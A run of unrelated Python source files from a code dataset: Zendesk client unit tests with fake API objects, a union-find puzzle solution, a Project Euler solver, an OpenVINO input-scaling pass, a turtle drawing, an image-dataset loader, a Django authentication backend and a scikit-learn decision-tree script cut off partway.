kwargs.get(\"email\")\n\n\nclass FakeUserResponse(object):\n def __init__(self, user_id):\n self.id = user_id\n\n\nclass FakeTicket(object):\n def __init__(self, ticket_id, requester=None):\n self.id = ticket_id\n self.status = \"open\"\n self.description = \"fakedescription\"\n self.subject = \"fakesubject\"\n self.requester_id = 1234\n self.requester = requester\n\n\nclass FakeTicketAudit(object):\n def __init__(self, ticket):\n self.ticket = ticket\n\n\nclass FakeApi(object):\n \"\"\"Aid testing tickets without using Zendesk API directly.\"\"\"\n\n class FakeUsers(object):\n def __init__(self, parent, me=None):\n self._me = me\n self._next_userid = 1\n self.parent = parent\n\n def create_or_update(self, zendesk_user: ZendeskUser) -> ZendeskUser:\n if zendesk_user.id:\n userid = zendesk_user.id\n else:\n zendesk_user.id = userid = self._next_userid\n self._next_userid += 1\n self.parent._users[userid] = zendesk_user\n return zendesk_user\n\n def me(self):\n return self._me\n\n def __call__(self, id: int) -> ZendeskUser:\n \"\"\"Recover a specific user.\"\"\"\n user = self.parent._users.get(id, None)\n if user:\n return user\n else:\n return None\n\n class FakeTicketCRUD(object):\n def __init__(self, parent, ticket_audit=None):\n self.ticket_audit = ticket_audit\n self._next_ticket_id = 1\n self.parent = parent\n\n def update(self, ticket):\n \"\"\"No actual update performed\"\"\"\n tickettoupdate = self.parent._tickets.get(ticket.id, None)\n if tickettoupdate:\n self.parent._tickets[ticket.id] = ticket\n return FakeTicketAudit(ticket)\n else:\n return None\n\n def create(self, ticket):\n \"\"\"Pretend to create a zendesk ticket and return the canned\n result.\n \"\"\"\n ticket.id = self._next_ticket_id\n ticket.created_at = datetime.datetime.now()\n self.parent._tickets[ticket.id] = ticket\n self._next_ticket_id += 1\n return FakeTicketAudit(ticket)\n\n def __call__(self, id: int) -> Ticket:\n \"\"\"Recover a specific ticket.\"\"\"\n ticket = self.parent._tickets.get(id, None)\n if ticket:\n return ticket\n else:\n raise exception.RecordNotFoundException\n\n def __init__(self, tickets=[], me=None, ticket_audit=None, users=[]):\n self.results = tickets\n self._users: dict[int, FakeUser] = dict([(user.id, user) for user in users])\n self.users = self.FakeUsers(self, me=me)\n self._tickets: dict[int, FakeTicket] = dict(\n [(ticket.id, ticket) for ticket in 
tickets]\n )\n self.tickets = self.FakeTicketCRUD(self, ticket_audit)\n\n for ticket in tickets:\n self._tickets[ticket.id] = ticket\n\n def search(self, chat_id, type):\n return self.results\n\n\nclass TestZenDesk(unittest.TestCase):\n def test_zendesk_create_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n zendesk_manager.client = FakeApi()\n user = HelpDeskUser(\n full_name=\"Jim Example\", email=\"test@example.com\" # test email /PS-IGNORE\n )\n heldeskuser = zendesk_manager.get_or_create_user(user=user)\n\n assert heldeskuser.id == 1\n\n def test_zendesk_get_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n user = HelpDeskUser(id=1234)\n help_desk_user = zendesk_manager.get_or_create_user(user=user)\n\n assert help_desk_user.id == 1234\n assert help_desk_user.full_name == \"Jim Example\"\n assert help_desk_user.email == \"test@example.com\" # test email /PS-IGNORE\n\n def test_zendesk_get_cached_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user], me=FakeUserResponse(1234))\n help_desk_user = zendesk_manager.get_or_create_user()\n\n assert help_desk_user.id == 1234\n\n def test_error_zendesk_cannot_get_or_create_user(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n with self.assertRaises(HelpDeskException):\n zendesk_manager.get_or_create_user(user=HelpDeskUser())\n\n def test_zendesk_create_ticket(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n }\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: value\",\n user=user,\n custom_fields=[HelpDeskCustomField(id=123, value=\"some-service-name\")],\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n actualticket = zendesk_manager.create_ticket(ticket=ticket)\n assert actualticket.id == 1\n assert actualticket.subject == ticket.subject\n assert actualticket.custom_fields == [\n HelpDeskCustomField(id=123, value=\"some-service-name\")\n ]\n\n def test_zendesk_create_ticket_with_all_details(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n }\n )\n\n user = 
HelpDeskUser(id=1234)\n\n comment = HelpDeskComment(\n body=\"This is the initial ticket comment.\",\n public=False,\n )\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: value\",\n user=user,\n tags=[\"tag1\", \"tag2\"],\n external_id=789,\n group_id=456,\n assingee_id=3456,\n comment=comment,\n priority=Priority.NORMAL,\n status=Status.OPEN,\n ticket_type=TicketType.TASK,\n custom_fields=[HelpDeskCustomField(id=123, value=\"some-service-name\")],\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n zendesk_manager.client = FakeApi(users=[fake_user])\n\n actualticket = zendesk_manager.create_ticket(ticket=ticket)\n assert actualticket.id == 1\n assert actualticket.subject == ticket.subject\n assert actualticket.tags == ticket.tags\n assert actualticket.external_id == ticket.external_id\n assert actualticket.group_id == ticket.group_id\n assert actualticket.assingee_id == ticket.assingee_id\n assert actualticket.priority == ticket.priority\n assert actualticket.status == ticket.status\n assert actualticket.comment.author_id == 1234\n assert actualticket.comment.body == ticket.comment.body\n assert actualticket.comment.public == ticket.comment.public\n assert actualticket.custom_fields == [\n HelpDeskCustomField(id=123, value=\"some-service-name\")\n ]\n\n def test_zendesk_get_ticket(\n self,\n ):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n subject=\"fakesubject\", description=\"fakedescription\", user=user, id=12345\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n actualticket = zendesk_manager.get_ticket(ticket_id=12345)\n assert actualticket.id == ticket.id\n\n def test_error_zendesk_does_not_get_ticket(\n self,\n ):\n\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.get_ticket(ticket_id=54321)\n\n def test_zendesk_add_comment(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n comment = HelpDeskComment(body=\"adding this comment\", author_id=user.id)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(user.id),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n actualticket = zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n assert actualticket.id == 12345\n assert actualticket.subject == \"fakesubject\"\n assert 
actualticket.comment.body == comment.body\n\n def test_zendesk_add_comment_no_author_id(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n comment = HelpDeskComment(body=\"adding this comment\", public=False)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(1234),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n actualticket = zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n assert actualticket.id == 12345\n assert actualticket.subject == \"fakesubject\"\n assert actualticket.comment.body == comment.body\n assert actualticket.comment.public == comment.public\n assert actualticket.comment.author_id == 1234\n\n def test_error_zendesk_add_comment_not_found(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n comment = HelpDeskComment(body=\"adding this comment\", author_id=user.id)\n\n fake_user = FakeUser(\n id=1234, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=98765, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket],\n me=FakeUserResponse(user.id),\n ticket_audit=fake_ticket_audit,\n users=[fake_user],\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.add_comment(ticket_id=12345, comment=comment)\n\n def test_zendesk_update_ticket(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=\"test@example.com\", # test email /PS-IGNORE,\n subject=\"subject123\",\n description=\"Field: updated\",\n user=user,\n id=12345,\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n updatedticket = zendesk_manager.update_ticket(ticket=ticket)\n\n assert updatedticket.id == ticket.id\n assert updatedticket.description == \"Field: updated\"\n\n def test_error_zendesk_update_ticket_not_found(self):\n\n email = \"test@example.com\" # test email /PS-IGNORE\n\n user = HelpDeskUser(id=1234)\n\n ticket = HelpDeskTicket(\n recipient_email=email,\n subject=\"subject123\",\n description=\"Field: updated\",\n user=user,\n id=54321,\n )\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_user = FakeUser(\n id=1234,\n name=\"Jim Example\",\n email=\"test@example.com\", # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n 
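# note: the fake store below only holds ticket 12345, so updating ticket 54321 must raise\n 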
tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.update_ticket(ticket=ticket)\n\n def test_zendesk_close_ticket(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_user = FakeUser(\n id=123, name=\"fakename\", email=\"fake@email.com\" # test email /PS-IGNORE\n )\n fake_ticket = FakeTicket(ticket_id=12345, requester=fake_user)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit, users=[fake_user]\n )\n\n actualticket = zendesk_manager.close_ticket(ticket_id=12345)\n\n assert actualticket.id == 12345\n assert actualticket.status == Status.CLOSED\n\n def test_error_zendesk_close_ticket_not_found(self):\n zendesk_manager = ZendeskManager(\n credentials={\n \"email\": \"test@example.com\", # test email /PS-IGNORE\n \"token\": \"token123\",\n \"subdomain\": \"subdomain123\",\n },\n )\n\n fake_ticket = FakeTicket(ticket_id=12345)\n fake_ticket_audit = FakeTicketAudit(fake_ticket)\n zendesk_manager.client = FakeApi(\n tickets=[fake_ticket], ticket_audit=fake_ticket_audit\n )\n\n with self.assertRaises(HelpDeskTicketNotFoundException):\n zendesk_manager.close_ticket(ticket_id=54321)\n","repo_name":"uktrade/help-desk-client","sub_path":"tests/test_zendesk_manager.py","file_name":"test_zendesk_manager.py","file_ext":"py","file_size_in_byte":18152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30872607055","text":"#https://www.acmicpc.net/problem/4195\n'''\nUnion Find algorithm\n- Reference: https://www.youtube.com/watch?v=Ha0w2dJa2Nk\n- A data structure for handling elements partitioned into disjoint subsets\n- find function: an operation that tells which set a particular element belongs to\n- union function: an operation that merges the sets containing two elements into one\n\n'''\nfrom collections import defaultdict\ndef find(x):\n # if x equals its parent, return x; that is, x is the root node\n if x == parent[x]: return x\n # cache the result in parent[x], DP-style, to avoid repeated work (path compression)\n # keep recursing until the root node is found\n else:\n p = find(parent[x])\n parent[x] = p\n return parent[x]\n\ndef unite(x,y): \n # find the root nodes of x and y\n x,y = find(x),find(y)\n # merge under node x.\n if x != y: # when x and y do not share the same root\n parent[y] = x # merge under node x\n num[x] += num[y] # track how many people are in the friend network\n'''\nImplementation idea\n1. Keep the parent bookkeeping in a dictionary\n - the inputs arrive as strings\n2. If an input value is not yet a key of the dictionary, register it as its own root\n3. Merge each input pair (union)\n'''\nans = []\nT = int(input())\nfor _ in range(T): \n parent, num = defaultdict(int),defaultdict(int)\n F = int(input()) \n for _ in range(F):\n a,b = input().split(\" \")\n # register as a root if the key is not in parent yet\n if a not in parent:\n parent[a] = a # set as its own root\n num[a] = 1\n if b not in parent:\n parent[b] = b\n num[b] = 1\n unite(a,b) # a and b are friends, so merge them\n ans.append(num[find(a)])\nprint(*ans,sep='\\n') \n \n'''\n1\n8\na b\nb c\nd e\ne f\ng h\nh i\na f\nc i\n'''","repo_name":"lgerd999/Baekjoon","sub_path":"01. Graph/5. 
UnionFind/BJ_G2_친구네트워크_4195.py","file_name":"BJ_G2_친구네트워크_4195.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22951840334","text":"import itertools\nfrom pprint import pprint\n\nfrom pe.misc import divisors, sieve_of_eratosthenes_fast\n\n\ndef solve():\n digits = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # digits = [1, 2, 3, 4]\n all_perms = list(itertools.permutations(digits))\n perms_columns = list(zip(*all_perms))\n\n products = set()\n for i in range(1, 5):\n for j in range(i + 1, 6):\n a = zip(*perms_columns[0:i])\n b = zip(*perms_columns[i:j])\n product = zip(*perms_columns[j:])\n\n a = map(lambda x: list(map(str, x)), a)\n b = map(lambda x: list(map(str, x)), b)\n product = map(lambda x: list(map(str, x)), product)\n\n a = map(lambda x: \"\".join(x), a)\n b = map(lambda x: \"\".join(x), b)\n product = map(lambda x: \"\".join(x), product)\n\n a = map(int, a)\n b = map(int, b)\n product = map(int, product)\n\n actual_products = filter(\n lambda trip: trip[0] == trip[1] * trip[2], zip(product, a, b)\n )\n actual_products = list(zip(*actual_products))\n if len(actual_products) > 0:\n products.update(actual_products[0])\n\n return str(sum(products))\n","repo_name":"tabenmalik/Project-Euler","sub_path":"pe/problems/p032.py","file_name":"p032.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27158564409","text":"import numpy as np\n\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom extensions.ops.elementwise import Mul\nfrom mo.ops.op import Op\nfrom mo.utils.error import Error\n\n\nclass ScaleInput(MiddleReplacementPattern):\n enabled = True\n\n def run_after(self):\n from extensions.middle.pass_separator import PreMiddleStart\n return [PreMiddleStart]\n\n def run_before(self):\n from extensions.middle.AddMeanScaleValues import AddMeanScaleValues\n return [AddMeanScaleValues]\n\n def pattern(self):\n return dict(\n nodes=[\n ('placeholder', dict(kind='op', op='Parameter')),\n ('data', dict(kind='data'))],\n edges=[\n ('placeholder', 'data'),\n ],\n )\n\n def replace_pattern(self, graph: Graph, match: dict):\n scale = graph.graph['cmd_params'].scale\n if scale is None or scale == 1:\n return\n assert (len(match['placeholder'].out_nodes()))\n\n tinput = match['placeholder']\n if not tinput.has_valid('shape'):\n raise Error(\"Node {} has not valid shape attribute\".format(tinput.id))\n\n input_shape = tinput.shape\n toutput = match['data']\n\n # Create Mul node\n value = np.array([1 / scale])\n\n # Disconnect input with data node\n graph.remove_edge(tinput.id, toutput.id)\n\n # Create Mul node\n mul_node = Mul(graph, dict(name=\"Mul1_\"))\n mul_data = Op.create_input_data_node(graph, \"data_mul_scale_\", np.array(value))\n Op.expand_node_shape(mul_data, len(input_shape) - 2 if graph.graph['layout'] == 'NCHW' else 0)\n mul_input = Op.create_data_node(graph, tinput, {'shape': toutput.shape})\n\n mul_node.create_node_with_data(inputs=[mul_input, mul_data], data_nodes=toutput)\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/model_optimizer/extensions/middle/ScaleInput.py","file_name":"ScaleInput.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"22951705835","text":"from turtle import Turtle, 
Screen\nimport random\n\n# Spirograph\n\ntimmy = Turtle()\nscreen = Screen()\n\ntimmy.shape('turtle')\ntimmy.pensize(3)\ntimmy.speed('fastest')\n\ndef change_color():\n R = random.random()\n B = random.random()\n G = random.random()\n timmy.color(R, G, B)\n\ndef draw_spirograph(size_gap):\n for _ in range(int(360/size_gap)):\n timmy.circle(120)\n change_color()\n timmy.setheading(timmy.heading() + size_gap)\n\ndraw_spirograph(10)\n\nscreen.exitonclick()\n\n","repo_name":"Ankit3794/python-100-days-of-code","sub_path":"day-18-turtle-challenges/turtle_challenge_5.py","file_name":"turtle_challenge_5.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"7922987876","text":"import unittest\nimport numpy as np\nimport matplotlib.image as mpimg\nimport os\nfrom Globals import DATA_PATH, SMALL_DATA_PATH\nfrom typing import List, Dict, Tuple\nfrom scipy import ndimage\n\ndef loadImage(fullPath: str, display: bool = False)->np.ndarray:\n \"\"\"\n Load an image and normalize it for training/display\n :param fullPath: Image full path\n :param display: Normalize for display\n :return: Image as a Numpy array\n \"\"\"\n img = mpimg.imread(fullPath)\n if not display:\n img = img.astype(np.float32) / 255.\n return img\n\nclass GeologicalDataset():\n \"\"\"\n A class to manage the dataset of geological images\n \"\"\"\n class Samples:\n \"\"\"\n Holds Numpy arrays of query and reference images, and their joint labels. This data structure matches the\n input needed by the Siamese network. The query and reference image arrays are of the same size. The label for each\n pair is 1 if both belong to the same class, and 0 if they belong to different classes.\n \"\"\"\n def __init__(self, queries: List[np.array], references: List[np.array], labels: List[np.float32]):\n self.queries = np.array(queries)\n self.references = np.array(references)\n self.labels = np.array(labels)\n\n def __init__(self, path: str, augmentRatio = 0.1):\n \"\"\"\n Initializes GeologicalDataset\n :param path: Path to dataset of queries and reference images\n :param augmentRatio: Ratio of data to augment for training\n \"\"\"\n self.__filepaths: List[str] = [] # List of full paths to images\n self.__labels: List[int] = [] # Labels for each image (rock type)\n self.__labelType: Dict[str, int] = {'andesite': 0, 'gneiss': 1, 'marble': 2, 'quartzite': 3, 'rhyolite': 4,\n 'schist': 5}\n self.__samples = GeologicalDataset.Samples([], [], [])\n\n # Dataset augmentation\n self.__augmentRatio = augmentRatio\n\n # Extracting all image filenames and labels from data path\n pathIter = os.walk(path)\n for root, directories, files in pathIter:\n for file in files:\n filename, fileExtension = os.path.splitext(file)\n if fileExtension != '.jpg':\n continue\n self.__filepaths.append(os.path.join(root, file))\n self.__labels.append(self.__labelType[os.path.split(root)[1]]) # Append image directory as rock type\n\n def initDataset(self, training = True) -> None:\n \"\"\"\n Initializes the dataset by loading all query and reference images defined by the list of predefined paths. For\n training, reference images are also loaded. For each query, a random image is loaded as its reference. 
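Reference images are drawn uniformly at random, so the balance of matching and non-matching pairs is not controlled. 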
A label\n for the pair is set based on whether the two images belong to the same class or not\n :param training: Indicates whether dataset is initialized for training (for inference there is no need to\n assign reference images)\n \"\"\"\n # Loading images\n images = []\n for filepath in self.__filepaths:\n images.append(loadImage(filepath))\n\n # Creating pairs of queries and reference images, and the proper positive/negative labels\n queries = []\n references = []\n labels = []\n for idx, image in enumerate(images):\n\n # Adding to dataset\n queries.append(image)\n if training:\n idxReference = np.random.randint(0, len(images)) # high bound is exclusive\n references.append(images[idxReference])\n labels.append(np.float32(1.) if self.__labels[idx] == self.__labels[idxReference] else\n np.float32(0.)) # 1 = same class, 0 = different classes (see Samples docstring)\n\n # Augment training dataset (only for training)\n if training and self.__augmentRatio > 0:\n self.__augment(queries, references, labels)\n\n # Initialize training sample dataset\n self.__samples = GeologicalDataset.Samples(queries, references, labels)\n\n def __augment(self, queries: List[np.array], references: List[np.array], labels: List[np.float32]) -> None:\n \"\"\"\n Augments the training dataset with transformed copies of images\n :param queries: Basic set of query images\n :param references: Basic set of reference images\n :param labels: Labels of basic set pairs\n \"\"\"\n queriesAugment = []\n referencesAugment = []\n labelsAugment = []\n for query, reference, label in zip(queries, references, labels):\n if np.random.rand(1) >= self.__augmentRatio: # Skip samples not augmented\n continue\n\n # Augmentation type - flip a coin between flipping the image and rotating it\n if np.random.rand(1) >= 0.5: # Flip the image\n queriesAugment.append(np.flip(query, axis=0))\n else: # Rotate the image\n queriesAugment.append(ndimage.rotate(query, 45, mode='mirror', reshape=False))\n referencesAugment.append(reference)\n labelsAugment.append(label)\n\n # Extend basic query, reference, and label set by the augmented samples\n queries.extend(queriesAugment)\n references.extend(referencesAugment)\n labels.extend(labelsAugment)\n\n def imageShape(self) -> Tuple[int, int, int]:\n \"\"\"\n Returns a sample image size\n :return: Tuple of H-W-C\n \"\"\"\n shape = self.__samples.queries.shape\n return shape[1], shape[2], shape[3]\n\n def queryFilePaths(self) -> List[str]:\n \"\"\"\n Returns file paths of dataset images\n :return: List of file paths\n \"\"\"\n return self.__filepaths\n\n def queryLabels(self) -> List[int]:\n \"\"\"\n Returns the labels of query images (used for inference)\n :return: List of integers (0-5)\n \"\"\"\n return self.__labels\n\n def queries(self) -> np.array:\n \"\"\"\n Returns the query images in the dataset\n :return: Numpy array of images (batch axis = 0)\n \"\"\"\n return self.__samples.queries\n\n def references(self) -> np.array:\n \"\"\"\n Returns the reference images in the dataset\n :return: Numpy array of images (batch axis = 0)\n \"\"\"\n return self.__samples.references\n\n def labels(self) -> np.array:\n \"\"\"\n Returns labels of query-reference pairs (1 for a pair that belongs to the same class; 0 otherwise)\n :return: Numpy array of labels (batch axis = 0)\n \"\"\"\n return self.__samples.labels\n\nclass MyTestCase(unittest.TestCase):\n def test_load_image(self):\n loadImage(os.path.join(DATA_PATH, 'andesite/0A5NL.jpg'))\n\n def test_display_image(self):\n from matplotlib import pyplot as plt\n img = loadImage(os.path.join(DATA_PATH, 'andesite/0A5NL.jpg'), display=True)\n plt.figure()\n plt.imshow(img)\n plt.show()\n\n 
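# An added sanity check (a sketch, not part of the original suite; assumes SMALL_DATA_PATH holds at least one image):\n # queries, references, and labels must stay batch-aligned after initDataset().\n def test_dataset_alignment(self):\n ds = GeologicalDataset(SMALL_DATA_PATH, augmentRatio=0.0)\n ds.initDataset()\n self.assertEqual(len(ds.queries()), len(ds.references()))\n self.assertEqual(len(ds.queries()), len(ds.labels()))\n\n 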
def test_dataset(self):\n ds = GeologicalDataset(SMALL_DATA_PATH, augmentRatio=0.5)\n ds.initDataset()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"YanivHollander/Geological-Image-Similarity","sub_path":"DataIO_TF.py","file_name":"DataIO_TF.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"34129527319","text":"import logging\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import authentication, exceptions\nfrom smeApi_auth.models import ApiKey\n\n\nUser = get_user_model()\nLOGGER = logging.getLogger(__name__)\n\n\nclass APIKEYBackend(authentication.BaseAuthentication):\n \"\"\"\n Authenticate against api key\n \"\"\"\n\n def authenticate(self, request):\n \"\"\"Get the user via api key\"\"\"\n auth = request.META.get('HTTP_AUTHORIZATION', '').split()\n\n if len(auth) != 2:\n raise exceptions.AuthenticationFailed(\n 'Invalid authorization header.')\n\n key = auth[1]\n\n try:\n api_key = ApiKey.objects.get(key=key)\n return (api_key.user, None)\n except ApiKey.DoesNotExist:\n raise exceptions.AuthenticationFailed('Invalid Api Key.')\n\n def get_user(self, user_id):\n try:\n user = User.objects.get(pk=user_id)\n if user.is_active:\n return user\n return None\n except User.DoesNotExist:\n return None\n\n\nclass EmailOrUsernameModelBackend(object):\n \"\"\"\n Simple backend to allow users to log in with their email or\n their username in auth forms\n \"\"\"\n\n def authenticate(self, username=None, password=None):\n if '@' in username:\n kwargs = {'email': username}\n else:\n kwargs = {'username': username}\n try:\n user = User.objects.get(**kwargs)\n if user.check_password(password):\n return user\n return None\n except User.DoesNotExist:\n return None\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n","repo_name":"celelstine/smeApi","sub_path":"config/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6397997141","text":"from sklearn import tree\nfrom scipy.io import arff\nimport numpy as num\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectKBest, mutual_info_classif\nfrom sklearn.model_selection import cross_validate, KFold\n\nfile = open(\"breast.w.arff\", \"r\")\ndata, meta = arff.loadarff(file)\n\ninput = data[meta.names()[:-1]].tolist()\noutput = data[\"Class\"].tolist()\n\nprint(\"5)\")\nprint(\"i.\")\nslFeatures = [[],[]]\nkFol = KFold(n_splits=10, shuffle=True, random_state=47)\nfor i in [1,3,5,9]:\n input_new = SelectKBest(mutual_info_classif, k=i).fit_transform(input,output)\n classifier = tree.DecisionTreeClassifier(criterion='entropy')\n crossRes = cross_validate(classifier, input_new, output, scoring = 'accuracy', cv = kFol, return_train_score=True)\n slFeatures[0].append(num.average(crossRes['test_score']))\n slFeatures[1].append(num.average(crossRes['train_score']))\n\nprint(\"Testing Accuracy:\", slFeatures[0])\nprint(\"Training Accuracy:\", slFeatures[1])\nprint(\"ii.\")\nslDepth=[[],[]]\nfor i in [1,3,5,9]:\n classifier = tree.DecisionTreeClassifier(criterion='entropy', max_depth=i)\n crossRes = cross_validate(classifier, input, output, scoring = 'accuracy', cv = kFol, return_train_score=True)\n slDepth[0].append(num.average(crossRes['test_score']))\n 
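# keeping the train scores alongside the test scores lets the plot below show the train/test gap at each depth\n 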
